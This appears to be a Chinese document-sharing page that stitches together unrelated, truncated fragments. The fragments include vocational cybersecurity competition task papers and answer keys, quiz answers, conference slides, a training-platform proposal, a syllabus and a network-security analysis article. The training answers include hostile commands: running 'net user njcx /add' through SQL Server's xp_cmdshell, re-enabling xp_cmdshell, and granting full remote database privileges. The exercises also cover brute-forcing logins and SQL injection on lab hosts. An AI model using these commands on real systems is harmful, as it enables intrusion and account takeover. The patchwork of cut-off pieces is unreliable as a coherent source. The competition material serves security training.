1.2 面向互联网+的云服务系统安全防护技术(重大共性关键技术类) 研究内容:针对体系架构、关键技术、防护系统研制等方面开展云服务系统纵深安全防护技术研究。重点研究可定义、可重构、可演进的云服务安全防护体系架构;研究分析用户和业务安全等级差异,实现高效灵活的安全服务链和安全策略按需定制;研究专有安全设备硬件解耦技术,实现安全资源弹性扩展与按需部署;研究云数据中心内生安全机理,突破软件定义动态异构冗余、主动变迁等关键技术,实现对未知漏洞和后门威胁的主动防御;实现云环境虚拟密码服务模型构建,密码服务资源动态调度,密码资源安全迁移及防护等关键技术;研究虚拟资源主

中职组“网络空间安全赛项”竞赛题-A

2019年山东省职业院校技能大赛 中职组“网络空间安全”赛项竞赛题-A卷一、竞赛时间 8:30-11:30,共计3小时。 二、竞赛阶段 三、竞赛任务书内容(一)拓扑图

(二)第一阶段任务书(700分) 任务一:暴力破解 任务环境说明: ?服务器场景名称:sql008 ?服务器场景操作系统:Microsoft Windows2008 Server ?服务器场景用户名:administrator;密码:未知 1.使用渗透机场景kali中工具扫描服务器场景,将iis的版本号作为flag提交; 2.使用渗透机场景windows7访问服务器场景,并下载某文件夹下的web目录下的 username.txt和wxl_pass_burp.txt,并将username.txt中的用户数量作为flag提 交; 3.使用渗透机场景windows7访问服务器中的暴力破解首页,并将首页的flag提交; 4.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入 基于表单的暴力破解进行账号密码的爆破,将爆破后返回的flag提交; 5.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入 验证码绕过(on server)进行账号密码的爆破,将爆破后返回的flag提交; 6.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入 验证码绕过(on client)进行账号密码的爆破,将爆破后返回的flag提交; 任务二:Linux操作系统渗透测试 任务环境说明: ?服务器场景:Linux2020 ?服务器场景操作系统:Linux(版本不详) 1.通过本地PC中渗透测试平台Kali 2.0对服务器场景Linux2020进行系统服务及版本 扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag 值提交; 2.通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2020进行渗透测试,将该 场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交; 3.通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2020进行渗透测试,将该 场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;

网络空间安全实训题与讲解

训测二1-1 在服务器场景 CentOS5.5上通过Linux命令行开启mysql服务,并将开启该服务命令字符串作为flag值提交: service mysqld start 训测二1-2 在服务器场景 CentOS5.5上进入mysql 删除user表中host为127.0.0.1 的用户,查询剩下用户记录,把查询结果倒数第二条记录的host字段值作为flag值提交:localhost 训测二1-3在服务器场景 CentOS5.5上进入mysql (使用grant语句)添加一个用户test 密码为,它的host为172.19.5.100 ,并赋予所有权限,将所输入代码作为flag值提交:grant all privileges ON *.* TO ‘test’@’172.19.5.100’identified by ‘’with grant option; 训测二1-4在服务器场景 CentOS5.5上进入mysql 的配置文件,限制最大连接数为2,并将mysql的配置文件路径F1,及其增加的一行F2作为flag值提交:格式为(F1|F2) (/etc/https://www.360docs.net/doc/1911593262.html,f|max_user_connections=2) 训测二1-5在服务器场景 CentOS5.5上进入mysql 的配置文件,使其他主机不能远程连接数据库F1,并禁止对本地文件存取F2,将其增加行作为Flag值提交:格式为{F1|F2} {skip-networking|set-variable=local-infile=0} 训测二1-6在服务器场景 CentOS5.5上进入mysql 的配置文件, 启动项加固,使访问能被审计,并将日志其路径作为flag值提交。 /usr/local/mysql/log/mysql.log 训测二1-7在服务器场景 CentOS5.5上开启http服务,其配置文件的路径作为flag值提交: /etc/httpd/conf/httpd.conf 训测二1-8在服务器场景 CentOS5.5上进入httpd配置文件,将网站发布目录作为flag 值提交:/var/ 训测二1-9在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod 训测二1-10在服务器场景 CentOS5.5上进入httpd配置文件修改代码使其不回显apache 版本信息。将修改后的代码作为flag值提交:ServerSignature Off 训测二1-11用渗透平台nmap 扫描靶机CentOS5.5 将其apache版本信息作为flag提交。Apache httpd 2.2.3 ((CentOS)) 训测二2-1在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号(用 netstat -an查询)F2作为flag值提交:格式为:F1|F2 SQL2KSP4|1433 训测二2-2在服务器场景 Windows2003上进入sqlserver2000 服务器使用存储过程添加系统用户njcx。将其输入代码作为flag值提交: exec master.dbo.xp_cmdshell ‘net user njcx /add’ 训测二2-3在服务器场景Windows2003上关闭xp_cmdshell服务,将其关闭的代码作为flag值提交: exec sp_dropextendedproc 'xp_cmdshell' 训测二2-4在服务器场景Windows2003 上开启xp_cmdshell 服务,将其开启的代码作为flag值提交: exec sp_addextendedproc xp_cmdshell,'xplog70.dll' 训测二2-5在服务器场景 Windows2003上使用netstat –an 查看端口,并将http有关的一行作为flag值提交:

网络空间安全国赛试题A

2017年全国职业院校技能大赛 中职组“网络空间安全”赛项国赛赛卷 一、竞赛阶段简介 二、拓扑图 实战平台网络

三、竞赛任务书 (一)第一阶段任务书 请使用谷歌浏览器登录服务器,根据《赛场参数表》提供的用户名密码登录,登录后点击“闯关关卡”,左侧有本阶段的三个任务列表。 点击右侧的“网络靶机”,进入虚机完成任务,找到FLAG值,填入空框内,点击“提交任务”按钮。 提示: FLAG中包含的字符是英文字符,注意英文字符大小写区分。 虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor); 虚拟机1安装工具集:Backtrack5; 虚拟机1安装开发环境:Python; 虚拟机2:WindowsXP(用户名:administrator;密码:123456)。 任务1.Linux操作系统服务渗透测试及安全加固 任务环境说明: ?服务器场景:(用户名:root;密码:123456) ?服务器场景操作系统: ?服务器场景操作系统安装服务:HTTP ?服务器场景操作系统安装服务:FTP ?服务器场景操作系统安装服务:SSH ?服务器场景操作系统安装开发环境:GCC ?服务器场景操作系统安装开发环境:Python 1.在服务器场景上通过Linux命令行开启HTTP服务,并将开启该服务命令字符串作为Flag值提交; 2.通过PC2中渗透测试平台对服务器场景进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

3.通过PC2中渗透测试平台对服务器场景进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OS Details:”之后的字符串作为Flag提交; 4.通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交; 5.通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果的HTTP 服务版本信息字符串作为Flag提交; 6.在服务器场景上通过Linux命令行关闭HTTP服务,并将关闭该服务命令字符串作为Flag值提交; 7.再次通过PC2中渗透测试平台对服务器场景进行系统服务及版本号扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果的第2项服务的PORT信息字符串作为Flag提交。 任务2. Windows操作系统服务渗透测试及安全加固 任务环境说明: ?服务器场景:WinServ2003(用户名:administrator;密码:空) ?服务器场景操作系统:Microsoft Windows2003 Server ?服务器场景操作系统安装服务:HTTP ?服务器场景操作系统安装服务:CA ?服务器场景操作系统安装服务:SQL 虚拟机操作系统WindowsXP打开Ethereal,验证监听到PC2虚拟机操作系统WindowsXP通过Internet Explorer访问IISServ2003服务器场景的页面内容,并将Ethereal监听到的页面内容在Ethereal程序当中的显示结果倒数第2行内容作为Flag值提交; 2.在PC2虚拟机操作系统WindowsXP和WinServ2003服务器场景之间建立SSL VPN,须通过CA服务颁发证书;IISServ2003服务器的域名为,并将

从重大事件看网络安全形势考试86分

? 1.网络安全与信息化领导小组的现任组长是(A)。(单选题3分)o A.习近平 o B.汪洋 o C.马凯 o D.刘延东 ? 2.下列国家中,不属于美国监听计划的成员国是(B)。(单选题3分)o A.澳大利亚 o B.朝鲜 o C.新西兰 o D.加拿大 ? 3.关于网络空间安全的新趋势,下列说法错误的是(A)。(单选题3分)o A.网络安全从根本上杜绝了颜色革命的发生 o B.网络事件引发的社会矛盾,催生了社会安全的新焦点 o C. 网络安全催生了文化安全的新命题 o D.网络安全催生了科技安全的新博弈 ? 4.关于恐怖组织对网络空间的威胁,下列说法错误的是(C)。(单选题3分)o A.有战术目标重点 o B. 协调隐蔽 o C.极少采取突发行动 o D.结果不可估量 ? 5.构建网络安全的短期目标是(D)。(单选题3分) o A.实现工业控制软件的国产化

o B.提升能力 o C.增加投资 o D.建设中国的专属网络 ? 6.当前,网络攻击的主要收益是(B)。(单选题3分) o A.系统的升级 o B.数据的获取 o C. 病毒的植入 o D.网络的控制 ?7.把信息安全写进国家总体安全观的是(A)。(单选题3分)o A.习近平 o B. 胡锦涛 o C.邓小平 o D.江泽民 ?8.美国进行监听计划的重点是围绕(A)展开的。(单选题3分)o A.网络 o B.人 o C.通讯工具 o D. 设备 ?9.网络安全与信息化领导小组成立的时间是( C )。(单选题3分)o A.2015年 o B.2012年 o C.2014年

o D.2013年 ?10.国家安全的核心数据是(A )。(单选题3分) o A.网络空间 o B.领土面积 o C.受教育人数 o D.国家机构 ?11.网络安全的苦处有(ACD)。(多选题4分) o A.各种风险共同叠加 o B.网络安全从业人员待遇不高 o C. 安全挑战和安全风险空前巨大 o D.安全形势多元复杂 ?12.下列事例中,能体现网络空间已经渗透到政治经济文化生活等各个领域的有(ABCD )。(多选题4分) o A.在携程网预定酒店 o B.在12306网站订火车票 o C.在淘宝网购物 o D.使用滴滴打车出行 ?13.关于网络空间的形成,说法正确的是(AC)。(多选题4分) o A.点→线→面→空间 o B.形成速度慢 o C.形成速度快 o D.点→面→线→空间

ZZ-2018065全国职业院校技能大赛中职组“网络空间安全”赛卷一

2018年全国职业院校技能大赛中职组 “网络空间安全”赛卷一 一、竞赛阶段 二、拓扑图

PC机环境: 物理机:Windows7; 虚拟机1:Ubuntu Linux 32bit(用户名:root;密码:toor),安装工具集:Backtrack5,安装开发环境:Python3; 虚拟机2:Kali(用户名:root;密码:toor); 虚拟机3:WindowsXP(用户名:administrator;密码:123456)。三、竞赛任务书 (一)第一阶段任务书(700分) 任务1. ARP扫描渗透测试(100分) 任务环境说明: ?服务器场景:server2003(用户名:administrator;密码:空) ?服务器场景操作系统:Windows server2003 1.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;(16分) 2.通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字作为Flag提交;(17分) 3. 通过本地PC中渗透测试平台BT5对服务器场景server2003行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;(16分) 4. 通过本地PC中渗透测试平台BT5对服务器场景server2003进行ARP

网络空间安全发展分析

致力于打造高品质文档网络空间安全发展分析 从1969 年ARPANET 问世至今,网络的发展大概经历了三次大的发展浪潮:第一次浪潮是传统互联网;第二次浪潮是万维网;第三次浪潮是网格、云计算、物联网和社交网络;目前正朝着人类社会信息世界物理世界三元世界融合的网络空间形态转变。网络空间安全状况也发生了重大变化,本文对网络空间的安全安全技术现状与发展趋势进行了分析。 1 网络空间的定义与属性 1.1 网络空间的定义 美国作家威廉吉布森在小说《融化的铬合金》中首次创造出Cyberspace(网络空间)这个词;并在小说《神经漫游者》中普及使用,吉布森把网络空间称为一种交感幻觉,将它描述为可带来大量财富和权力信息的计算机虚拟网络。在吉布森看来,现实世界和网络世界相互交融,人们可以感知到一个由计算机创造但现实世界并不存在的虚拟世界,这个充满情感的虚拟世界影响着人类现实世界。 网络空间是指由连接各种信息技术基础设施的网络以及所承载的信息活动构成的人为社会活动空间,包括互联网、电信网、计算机系统、及关键工业系统中的嵌入式处理器和控制器等,同时还涉及虚拟信息环境,以及人和人之间的相互影响。 1.2 网络空间的属性 网络空间具有实体属性、频谱属性、社会属性和逻辑属性。 1.2.1 实体属性 互联网、电信网、各种信息系统及各种控制系统构成了网络空间的实体属性。1.2.2 频谱属性 利用电磁波原理工作的无线电台、移动通信网络等构成了网络空间的频谱属性。 1.2.3 逻辑属性 其逻辑属性表现为数据和系统代码,数 字化的特征。 1.2.4 社会属性 其社会属性表现为知识和人类活动。 2 网络空间安全技术现状与发展趋势 2.1 缓冲区溢出攻击手段不断翻新 缓冲区溢出会导致应用程序异常、系统不稳定甚至崩溃危害,最主要的是攻击者不仅仅让程序出错,而且让程序改变其原有的逻辑,转而去执行一些攻击者所期望的恶意代码功能程序,从而窃取控制权进行攻击。如20XX 年爆发的心脏出血(HeartBleed)漏洞,利用该漏洞攻击者可窃取服务器内存当前存储的用户数据。 2.2 高级持续性威胁(APT)攻击 APT 攻击是指利用先进的攻击手段对特定目标进行长期持续性网络攻击,在发动攻击之前需要对攻击对象的业务流程和目标系统进行精确的收集。主动挖掘被攻击对象受信系统和应用程序的漏洞,利用这些漏洞组建攻击者所需的网络,以达到盗取敏感数据或达到某种目的的攻击。如震网病毒Stuxnet 攻击是典型的APT 攻击。 2.3 软硬件协同网络攻击

网络空间安全产业发展趋势

零和博弈还是纳什平衡——网络空间安全产业秩序展望

中国互联网安全大会 China Internet Security Conference 2015 “贵圈真乱”——那些过去的江湖恩怨 ? 2010年 于兵案——东方微点 vs 瑞星

中国互联网安全大会 China Internet Security Conference 2015 ?2011年奇虎诉瑞星不正当竞争案 ?2012-2014年金山与360多个互相诉讼,互有胜负 ?“贵圈真乱”——那些过去的江湖恩怨 “贵圈真乱”——那些过去的江湖恩怨

中国互联网安全大会 China Internet Security Conference 2015 2015年初一个奇怪的会议 ? 安全产品/服务收入占公司收入多少百分比以上的公司才能叫“网络安全公司”? ?360是“网络安全公司”么?

中国互联网安全大会 China Internet Security Conference 2015 中美信息安全企业营业收入对比 174 110.5 157 6,680 770.4 598.2 425.7 164 0 1,000 2,000 3,000 4,000 5,000 6,000 7,000 8,000启明星辰 绿盟科技 天融信 Symantec Fortinet PaloAlto Networks FireEye Imperva 2014年营业收入(USD$ M)

中国互联网安全大会 China Internet Security Conference 2015 网络空间安全全球500强分布 https://www.360docs.net/doc/1911593262.html,

信息安全仿真实训平台建设方案

xu 北京正阳天马信息技术有限公司 信息安全仿真实训平台 建设方案

目录 《信息安全仿真实训平台》概述 (3) 《信息安全仿真实训平台》主要功能 (4) 《信息安全仿真实训平台》优势 (5) 《信息安全仿真实训平台》设备组成及模块介绍 (5) 《信息安全仿真实训平台》实训方案介绍: (10) 《信息安全仿真实训平台》适用范围 (13)

《信息安全仿真实训平台》概述 《信息安全仿真实训平台》是北京正阳天马信息技术有限公司推出的一套用于信息安全相关实训教学的任务情景训练平台,主要由四部分组成: ?信息安全仿真实训中央控制台 ?信息安全仿真实训教师端系统 ?信息安全仿真实训实训端系统 ?信息安全仿真实训教学资料 ?《信息安全实训手册》 ?《信息安全实训课件》 ?《仿真实训平台用户使用手册》 《信息安全仿真实训平台》通过还原职业活动情景的方式,重建企业不同的网络安全需求,采用案例分析模式培养学生对企业各种安全问题的综合处理能力,使其掌握不同网络环境下对一系列安全产品的综合部署和配置方法。 仿真多种企业环境,无需要对现有设备和网络进行重新改造,便于维护管理。支持多人配合完成实训任务,具有高互动性和真实性,培养学生团队工作意识。实训方案来源于真实企业需求,并参照国家职业技能鉴定标准符合当前信息安全保障工作对实用型信息安全人才的要求,实现学习与就业的无缝衔接。 《信息安全仿真实训平台》可以很好地解决已建硬件实验室,但是实训组织困难的弊端,是硬件实训环境的完美补充,可以让学员在硬件实操前强化自己的动手能力,在正式上机操作前解决从会到熟练的过程,避免学员在实操硬件时的不知所措和极大减少误操作的概率,同时还可以缩短学员硬件操作的时间,从而提高宝贵的硬件环境的使用效率,延长硬件产品的使用寿命。

2020年网络继续教育《专业技术人员网络安全知识提升》题库A

一、判断题 1.信息资源整合与汇聚是把双刃剑。(对) 2.根据本讲,未来企业要抢占主导权,首先要抢占网络空间信息主导权,通过 信息流把控来优化配置资金流、人才流、技术流。(对) 3.移动互联网应用快速发展,在网络零售、移动支付、网络社交等领域涌现出 一大批移动互联网应用(对) 4.企业角度看,信息化发展,其产品和服务要高科技、高知识、高效益。(对) 5.“公共信息巡查义务”是网络服务提供者应履行的网络信息安全义务。(对) 6.制定应急预案是网络运营者的义务之 一。(对) 7.欧盟明确要求数据必须存储在本国服务器 内。(错) 8.网络空间已经成为了控制他国经济社会命脉的重要渠 道。(对) 9.我国互联网关键基础设施受制于人,主要指的是根服务器,全世界只有13台,1 个为主根服务器在美国,其余12个均为辅助根服务器,也全部在美 国。(错) 10.关键信息基础设施是指关系国家安全、国计民生,一旦数据泄露、遭到破坏或者丧 失功能可能严重危害国家安全、公共利益的信息设施。(对) 11.数据的完整性指数据是需要完整的、可靠的,在整个的传输和加工没有被植入木马, 也不至于丢失(对) 12.欧盟明确要求数据必须存储在本国服务器内。(错) 13.互联网治理与管理、管制是同一概念。(错) 14.我国现行的网络安全法律体系是以传统法律为基 础, 以网络专门法律为补充。 (对) 15.网络空间即全球公域,二者是同一概 念。(错) 16.2003年2月,美国颁布《网络空间安全国家战略》,首次明确网络安全战略的概念。 (错) 17.大数据时代要求架构云化,这对网络安全没有威胁。(错) 18.关键信息基础设施是指关系国家安全、国计民生,一旦数据泄露、遭到破坏或者丧 失功能可能严重危害国家安全、公共利益的信息设施。(对) 19.网络安全的内容之一物理安全,是指网络在设备上运行的软件是安全的,协议 是可以保障安全运行的。(错) 20.网络空间是独立的静态虚拟空间,跟物理空间无联系(错) 21.网络空间已成为了金融危机后世界各国适应经济新常态、转变经济发展方式、 培育经济新动能的重要支撑。(对) 22.互联网治理与管理、管制是同一概念。(错) 23.基础信息网络是指能源、金融、交通、教育、公共事业等领域和国家机关的 重要信息系统。(错) 24.网络空间即全球公域,二者是同一概念。(错) 25.支撑好政府职能转变的要求,当前重点应该放在信息化与政府的结合上。(错) 二、单选题 1.使用网络的主体是实实在在的人,体现了网络空间的现实性特点。 2.网络空间与传统全球公域最大的不同是网络空间具有社会性。 3.2002年,美国国防部向国会提交《网络中心战》报告,提出将网络中心战作为国防 转型的指南,从平台中心战向网络中心战转型。 4. 我国互联网产业正在规模迅速壮大,全球互联网企业市值前200强,我国企业 占 家。 8

《网络空间安全综合实验》教学大纲

《网络空间安全综合实验》教学大纲 课程编号:CE4901 课程名称:网络空间安全综合实验 英文名称:Comprehensive Project of Information Security Program 学分/学时:1/16 课程性质:选修 适用专业:网络空间安全建议开设学期:7 先修课程:网络空间安全导论、计算机数学、现代密码学、计算机网络原理、网络空间安全与风险管理、计算机与网络安全等 开课单位:网络与信息安全学院 一、课程的教学目标与任务 网络信息安全专业综合实践是网络空间安全专业的一门专业选修课,是在网络空间安全导论、计算机数学、计算机组成原理、应用安全、现代密码学、计算机网络原理、网络空间安全与风险管理、计算机与网络安全、软件安全等多门课程知识的综合应用,是集理论知识、实用技术和实践技能于一体的综合工程实践课程。通过该课程的学习和实践,可以让学生在综合运用各种理论知识的基础上,结合具体案例并动手进行工程应用设计,使学生直接体验工程设计的方案制订、方案实施、设计实现和综合测试等,提高分析问题解决问题的能力,达到综合应用的目的,进一步加深学生对网络空间安全相关理论和概念的理解和综合应用。 通过本课程的学习,学生能充分运用并掌握网络与安全协议综合设计、分析与应用,广域网组网的基本方法和过程,综合应用所有网络空间安全基本知识与方法,进一步巩固网络空间安全基础理论和知识,为网络空间安全开发与网络安全系统的组建、规划和管理打下良好基础。 二、课程具体内容及基本要求 1.综合工程设计的指导老师 一般每届由15~20名有科研项目开发经验的老师组成综合工程设计指导教师组,对学生的综合工程设计进行指导,要求指导老师具有丰富的网络安全开发和工程经验,具有指导综合工程设计学生的精力和时间。

江苏省中职组网络空间安全赛项赛题B

2017年江苏省职业学校信息技术类技能大赛 网络空间安全(中职组)B卷 一、竞赛时间 9:00-12:00,共计3小时。 二、竞赛阶段简介

三、竞赛任务书内容 (一)拓扑图 (二)第一阶段任务书 1.根据网络拓扑图所示,配置交换机的管理VLAN为VLAN888; 2.根据网络拓扑图所示,配置交换机管理VLAN的IP地址为 88.88.88.X/24。(X为每参赛队所在组号); 3.据网络拓扑图所示,配置交换机telnet服务,交换机Telnet用户名:zhongke;密码:选手自行设定; 4.根据《赛场参数表》,配置交换机上连实战平台网络接口为Trunk; 5.根据《赛场参数表》,配置交换机实战平台管理VLAN为VLAN80,并将PC1所连接口划入该VLAN; 6.根据网络拓扑图所示,在第二阶段开始时按照《赛场参数表》配置交换机渗透测试VLAN,并将PC2所连接口划入该VLAN; 7.根据网络拓扑图所示,在第三阶段开始时按照《赛场参数表》配置交换机渗透测试VLAN,并预备将PC2所连接口划入该VLAN。

8.将交换机配置内容拷贝成文本文件保存到U盘根目录,文件名为参赛队所在组号。 (三)第二阶段任务书 请使用谷歌浏览器登录服务器192.168.80.1,根据《赛场参数表》提供的用户名密码登录,登录后点击“闯关关卡”,左侧有第二阶段的任务列表。 点击右侧的“网络靶机”,进入虚机完成任务,找到FLAG值,填入空框内,点击“提交任务”按钮。 提示:所有FLAG中包含的字符全部是英文字符。 虚拟机:Backtrack5(用户名:root;密码:toor) 虚拟机:WindowsXP(用户名:administrator;密码:123456) 任务1. 数据库安全加固 任务环境说明: ?服务器场景:WebServ2003(用户名:administrator;密码:空) ?服务器场景操作系统:Microsoft Windows2003 Server ?服务器场景安装服务/工具1:Apache2.2; ?服务器场景安装服务/工具2:Php6; ?服务器场景安装服务/工具3:Microsoft SqlServer2000; ?服务器场景安装服务/工具4:EditPlus; 1.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交。 2.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat –an命令,将回显的数据库服务连接状态作为Flag提交。 3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务

网络空间安全现状与国家战略

网络空间安全现状与国家战略 根据《国家网络空间安全战略》,网络空间在互联网与计算机网络技术的飞速发展下,已经成为了人类生活中延展出的另一个维度的新空间。网络空间安全关系到国家安全、军事外交、经济社会等领域的发展。一旦网络空间受到了威胁,所有基于互联网运行的社会系统将会受到威胁。所以,网络空间的全面管控、实时监测、资源分配及保护成为一个必须要解决的问题。 如下我们可以了解网络空间的重要程度: 信息传播的新渠道:突破了时空限制,拓展了传播范围,创新了传播手段 生产生活的新空间:网络深度融入人们的学习、生活、工作等方方面面 经济发展的新引擎:互联网日益成为创新驱动发展的先导力量 文化繁荣的新载体:促进了文化交流和知识普及,释放了文化发展活力,推动了文化创新创造,丰富了人们精神文化生活 社会治理的新平台:推动了政府决策科学化、民主化、法治化 交流合作的新纽带:促进了信息、资金、技术、人才等要素的全球流动,增进了不同文明交流融合 因此要坚定捍卫网络空间主权,那么我们将面临着什么样的任务呢?如下:

纵观国际网络空间测绘、安全研究工作研究发展的情况: DAPRA PLAN X:对网络战场地图的快速描绘,辅助生成并执行作战计划,并将作战结果反馈中枢指挥机关,从而推动网络作战效率和能力。 NSA藏宝图计划:对网际空间多层(地理层、物理层、逻辑层、社交层)数据的捕获及快速分析,从而形成的大规模情报生产能力。 DHSSHINE计划:网际空间中存在的关键基础设施行业相关设备的网络可达及安全态势。DHS爱因斯坦计划:网络安全自动监测项目,包括:入侵检测、入侵防御、数据分析和信息共享。 所以我们也应当做长足的发展计划,上升到战略层面,以谋求不落后于国际水准。

2017广西职业院校技能大赛中职组《网络空间安全》样题概要1讲解

“网络空间安全”项目竞赛任务书(样题)一、赛项时间 每场3小时。 二、赛项信息 三、赛项内容 (一)赛项环境设置 1.网络拓扑图

2.IP地址规划表 (二)第一阶段任务书(10分) 任务:网络空间安全平台搭建(10分) 1.根据网络拓扑图所示,设计连线,制作网线,做好机柜布线系统。 2.根据网络拓扑图所示,按照IP地址参数表,对网络设备的名称、各接口IP地址进 行配置。 3.根据网络拓扑图所示,按照IP地址参数表,部署服务器和主机。 4.据网络拓扑图所示,按照IP地址参数表,在交换机交换机上创建相应的VLAN,并 将相应接口划入VLAN。 5.配置三层交换机,通过Gratuitous ARP来抵御来自VLAN20接口的针对网关的ARP 欺骗攻击。 6.配置三层交换机,通过ARP Guard来抵御来自VLAN20接口的针对网关的ARP欺骗

攻击。 7.在三层交换机的PC2所连接端口配置Port Security特性,阻止PC2发起MAC Flooding渗透测试。 8.在三层交换机上配置Access Management安全特性,阻止PC2发起ARP Spoofing 渗透测试。 9.在三层交换机上配置端口环路检测(Loopback Detection),防止来自任意物理接 口下的单端口环路,并配置存在环路时的检测时间间隔为50秒,不存在环路时的检测时间间隔为20秒。 10.配置三层交换机生成树协议安全特性,阻止PC2发起BPDU DOS渗透测试。 (三)第二阶段任务书(60分) 任务1:SQL注入攻防 任务环境说明: 服务器场景:WebServ2003 服务器场景操作系统:Microsoft Windows2003 Server 服务器场景安装服务/工具1:Apache2.2; 服务器场景安装服务/工具2:Php6; 服务器场景安装服务/工具3:Microsoft SqlServer2000; 服务器场景安装服务/工具4:EditPlus; 1. 访问WebServ2003服务器场景,进入login.php页面,分析该页面源程序, 找到提交的变量名,并将该变量名作为Flag提交; 2. 对该任务题目1页面注入点进行SQL注入渗透测试,使该Web站点可通过 任意用户名登录,并将登录密码作为Flag提交; 3. 进入WebServ2003服务器场景的C:\AppServ\www目录,找到 loginAuth.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御SQL注入,并将修改后的PHP源程序中的Flag提交; 4. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对 WebServ2003服务器场景进行SQL注入渗透测试无效,并将Web页面回显内容作为Flag提交;

2020年福建省职业院校技能大赛中职组“网络空间安全”赛项省赛规程

2020年福建省职业院校技能大赛(中职组) “网络空间安全”赛项省赛规程 一、赛项名称 赛项编号:Z-53 赛项名称:网络空间安全 赛项组别:中职 竞赛形式:团体赛 赛项归属大类:信息技术 二、竞赛目的 通过竞赛,检验参赛选手对网络、服务器系统等网络空间中各个信息系统的安全防护能力,以及分析、处理现场问题的能力。通过本赛项的训练和比赛,培养更多学生掌握网络安全知识与技能,发展成为国家信息安全领域的技术技能人才。引导中等职业学校关注网络安全技术发展趋势和产业应用方向,促进网络信息安全专业建设与教学改革。赛项紧密结合新一代信息产业发展对网络安全应用型人才的需求,促进产教互动、校企融合,增强中职学校学生的新技术学习能力和就业竞争力,助力新一代信息技术产业快速发展。 三、竞赛内容 重点考核参赛选手网络系统安全策略部署、信息保护、网络安全运维管理的综合实践能力,具体包括: 1.参赛选手能够在赛项提供的服务器上配置各种协议和服务,实现网络系统的运行,并根据网络业务需求配置各种安全策略,以满足应用需求。 2.参赛选手能够根据大赛提供的赛项要求,实施网络空间安全防

护操作。 3.参赛选手能够根据网络实际运行中面临的安全威胁,确定安全策略并部署实施,防范并制止网络恶意入侵和攻击行为。 4. 参赛选手通过分组混合对抗的形式,能够实时防护自己服务器,抵御外界的攻击,同时能够对目标进行渗透和攻击。 5.竞赛总时长为3个小时,各竞赛阶段安排如下:

6.竞赛分值权重和时间安排 四、竞赛方式 1.本赛项为团体赛,以院校为单位组队参赛,不得跨校组队。每个参赛队由2名选手组成,同一学校报名参赛队不超过1支,每个参赛队限报2名指导教师。 五、竞赛规则 (一)报名资格 参赛选手须为2019年度在籍全日制中等职业学校学生;五年制全日制高职一至三年级(含三年级)在籍学生可参加比赛。参赛选手不限性别,年龄须不超过21周岁,年龄计算的截止时间以2019年5月1日为准。 (二)竞赛工位通过抽签决定,竞赛期间参赛选手不得离开竞赛工位。 (三)竞赛所需的硬件设备、系统软件和辅助工具由组委会统一安排,参赛选手不得自带硬件设备、软件、移动存储、辅助工具、移

网络空间安全发展分析论文

网络空间安全发展分析论文 从1969年ARPANET问世至今,网络的发展大概经历了三次大的发展浪潮:第一次浪潮是传统互联网;第二次浪潮是万维网;第三次浪潮是网格、云计算、物联网和社交网络;目前正朝着“人类社会—信息世界—物理世界”三元世界融合的网络空间形态转变。网络空间安全状况也发生了重大变化,本文对网络空间的安全安全技术现状与发展趋势进行了分析。 1网络空间的定义与属性 1.1网络空间的定义 美国作家威廉吉布森在小说《融化的铬合金》中首次创造出Cyberspace(网络空间)这个词;并在小说《神经漫游者》中普及使用,吉布森把网络空间称为一种“交感幻觉”,将它描述为可带来大量财富和权力信息的计算机虚拟网络。在吉布森看来,现实世界和网络世界相互交融,人们可以感知到一个由计算机创造但现实世界并不存在的虚拟世界,这个充满情感的虚拟世界影响着人类现实世界。 网络空间是指由连接各种信息技术基础设施的网络以及所承载的信息活动构成的人为社会活动空间,包括互联网、电信网、计算机系统、及关键工业系统中的嵌入式处理器和控制器等,同时还涉及虚拟信息环境,以及人和人之间的相互影响。 1.2网络空间的属性 网络空间具有实体属性、频谱属性、社会属性和逻辑属性。 1.2.1实体属性 互联网、电信网、各种信息系统及各种控制系统构成了网络空间的实体属性。

